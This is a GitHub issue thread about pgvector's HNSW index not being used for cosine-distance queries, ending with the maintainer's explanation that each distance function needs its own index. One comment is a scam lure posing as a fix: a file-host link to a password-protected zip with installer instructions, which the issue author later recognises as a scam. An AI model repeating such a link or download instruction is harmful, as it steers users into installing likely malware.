### ISSUE TITLE
 Issue with HNSW Index Utilization for Cosine Similarity Searches Using <=> Operator

### ISSUE THREAD

**Issue by RakshitKhajuria** [pgvector/pgvector#663]
### Description
I am currently working with PostgreSQL and using the HNSW index to optimize vector similarity searches. My aim is to leverage the `<=>` operator for cosine similarity measures. However, I've encountered an issue where this operator does not utilize the HNSW index as expected, resulting in a full sequential scan rather than an indexed scan.

### Details
- **Index used**: HNSW
- **Data type**: vector 

### Observations
I conducted several tests using `EXPLAIN ANALYZE` to better understand the query planner's behavior. Here's what I found:
- When using the `<->` operator (designed for Euclidean distance), the query planner successfully uses the HNSW index, resulting in significantly faster query times.
- Conversely, when I switch to the `<=>` operator for cosine similarity, PostgreSQL reverts to a full sequential scan. This seems to indicate a lack of support or optimization for cosine similarity in conjunction with the HNSW index.

#### Query Details
Here are the queries I executed:

1. **Euclidean Distance (Indexed)**:

```sql
   EXPLAIN ANALYZE SELECT * FROM my_table ORDER BY vector_column <-> query_vector LIMIT 10;
```

Result: Index Scan using my_table_vector_idx on my_table

2. Cosine Similarity (Sequential Scan):

```sql
EXPLAIN ANALYZE SELECT * FROM my_table ORDER BY vector_column <=> query_vector LIMIT 10;
```
Result: Sequential Scan on my_table

## Request
Could you please provide insights into:

- Whether the <=> operator is intended to support HNSW index utilization for cosine similarity in PostgreSQL?
- Any potential configuration or implementation steps I might have missed that could enable indexed searches with cosine similarity?
- If this functionality is not currently supported, could it be considered for future development?

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by RakshitKhajuria** [comment]
@bkballoon  Thank you for quick response. I wil try to extract this (btw Just letting you know i am on macos.)

**Comment by RakshitKhajuria** [comment]
Uh oh, seems like it was a scam 🥶

**Comment by ankane** [comment]
Hi @RakshitKhajuria, it sounds like you've indexed the L2 distance but not the cosine distance. You'll need to create an index for each distance function you want to use ([docs](https://github.com/pgvector/pgvector?tab=readme-ov-file#hnsw)).
